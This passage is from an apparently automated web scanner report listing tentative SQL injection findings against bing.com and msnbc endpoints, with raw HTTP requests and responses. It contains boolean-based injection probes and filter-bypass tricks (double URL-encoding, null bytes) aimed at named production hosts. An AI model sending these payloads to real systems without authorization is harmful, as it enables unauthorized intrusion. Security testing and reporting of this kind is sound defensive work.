Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16381
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:36 GMT
Connection: close
Set-Cookie: _SS=SID=B5E542B562A145F58CA0A9C7486B5C3B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:35 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c826dfb78d1ca415c8566199353a558d2; expires=Mon, 28-Jan-2013 23:52:35 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:35 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/browse?mkt=en-us&vid=&1''=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16453
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:36 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=890958F038CD487AB2C504C4D7322DEA; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:36 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ccf8ccbc4ec1244db9510910d7cb4667f; expires=Mon, 28-Jan-2013 23:52:36 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:36 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.103. http://www.bing.com/videos/results.aspx [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

Remediation detail

Request 1

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16345
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:06 GMT
Connection: close
Set-Cookie: _SS=SID=A43EDFE5938C41E59E291377E160BE27; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9e46db61c3b34eb9ad767d83ac45b8ba; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:00:06 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:00:07 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296406806; domain=.bing.com; path=/
Set-Cookie: _SS=SID=498134C0118345E48632264F8094F86E; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/

1.104. http://www.bing.com/videos/results.aspx [SRCHUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The SRCHUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SRCHUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7%2527; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16345
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 16:59:44 GMT
Connection: close
Set-Cookie: _SS=SID=4318D78D50E640FC90E674B1FECFA468; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7%2527%2527; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 16:59:45 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296406784; domain=.bing.com; path=/
Set-Cookie: _SS=SID=AB9D2F7799B041FC95AE8BD0B5721088; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/

1.105. http://www.bing.com/videos/results.aspx [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

Request 1

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16351
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:41 GMT
Connection: close
Set-Cookie: _SS=SID=9FA0FC98356248F88888BE6CE70BE8C9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c651eca1da172486cba0944037f5dcdd6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:42 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296345161; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C8F0CB274FED4F89A1536BA080934C88; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

1.106. http://www.bing.com/videos/results.aspx [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

Request 1

GET /videos/results.aspx?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16366
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:37 GMT
Connection: close
Set-Cookie: _SS=SID=8E0BAB48DE2E4E1287AF061964E47F83; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c69f8e53a62694ce680e4efd439e85e51; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/results.aspx?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse?q=
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:00:37 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296406837; domain=.bing.com; path=/
Set-Cookie: _SS=SID=92066549463145E090C30ADACCA54068; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/

1.107. http://www.msnbc.redacted/id/21134540/vp/41328239 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/21134540/vp/41328239

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19689523%20or%201%3d1--%20 and 19689523%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/21134540/vp/4132823919689523%20or%201%3d1--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 03:09:17 GMT
Date: Sun, 30 Jan 2011 03:09:17 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;
margin: 0 auto;
width: 995px;
}
#fb_frame {position:relative; top:5px; margin-right:3px;}
#vid_hed {font-size:12px;font-weight:bold; padding:0px 10px;margin-top:2px;}
#fb_reco {margin-right:0px; float:right;}
#fb_like {float:left;margin:6px 15px 0;}
#fb_sig, #fb_site {position:relative;top:-2px;}
#fb_site {margin-left:2px; top:4px; float:left;}
</style>

</head>

<body bgcolor="000000" style="margin:0px;text-align: center; color:#DDD">
<script>s_account="msnbcom";</script>
<script language=javascript src="http://www.msnbc.msn.com/js/std.js"></script>
<script language=javascript src="http://www.msnbc.msn.com/js/s_code.js"></script>

<div class="player_fb">
<div id="fb_header">
<span id="fb_like">
<span id="fb_site">msnbc.com:</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
</span>

<span id="fb_reco">
<span id="vid_hed">Video on MSNBC</span>
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe></span>
</span>
</span>

</div>
</div></div>
<div style="position:relative;top:0px;overflow:hidden;height:600;width:996;margin-left: auto;margin-right: auto;margin-top:-1px;"><div id=VpFlash style="position:re
...[SNIP]...

Request 2

GET /id/21134540/vp/4132823919689523%20or%201%3d2--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sun, 30 Jan 2011 03:09:17 GMT
Date: Sun, 30 Jan 2011 03:09:17 GMT
Content-Length: 4181
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head>
<script language='javascript' type='text/javascript'>

</script>
<title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;
margin: 0 auto;
width: 995px;
}
#fb_frame {position:relative; top:5px; margin-right:3px;}
#vid_hed {font-size:12px;font-weight:bold; padding:0px 10px;margin-top:2px;}
#fb_reco {margin-right:0px; float:right;}
#fb_like {float:left;margin:6px 15px 0;}
#fb_sig, #fb_site {position:relative;top:-2px;}
#fb_site {margin-left:2px; top:4px; float:left;}
</style>

</head>

<body bgcolor="000000" style="margin:0px;text-align: center; color:#DDD">
<script>s_account="msnbcom";</script>
<script language=javascript src="http://www.msnbc.msn.com/js/std.js"></script>
<script language=javascript src="http://www.msnbc.msn.com/js/s_code.js"></script>

<div class="player_fb">
<div id="fb_header">
<span id="fb_like">
<span id="fb_site">msnbc.com:</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
</span>

<span id="fb_reco">
<span id="vid_hed">Video on MSNBC</span>
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe><
...[SNIP]...

1.108. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/24780215/ns/technology_and_science-games

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /id/24780215%00'/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"
...[SNIP]...
<h2>Bad Request - Invalid URL</h2>
...[SNIP]...

Request 2

GET /id/24780215%00''/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 03:10:15 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /id/24780215%00''/ns/technology_and_science-games was
...[SNIP]...

1.109. http://www.msnbc.redacted/id/37643077 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/37643077

Issue detail

Request 1

GET /id/37643077'%20and%201%3d1--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/37643077'%20and%201%3d2--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.110. http://www.msnbc.redacted/id/37643077 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/37643077

Issue detail

Request 1

GET /id/37643077?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/37643077?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.111. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41164445/ns/world_news-africa/

Issue detail

Request 1

GET /id/41164445'%20and%201%3d1--%20/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41164445'%20and%201%3d2--%20/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.112. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41164445/ns/world_news-africa/

Issue detail

Request 1

GET /id/41164445/ns/world_news-africa'%20and%201%3d1--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

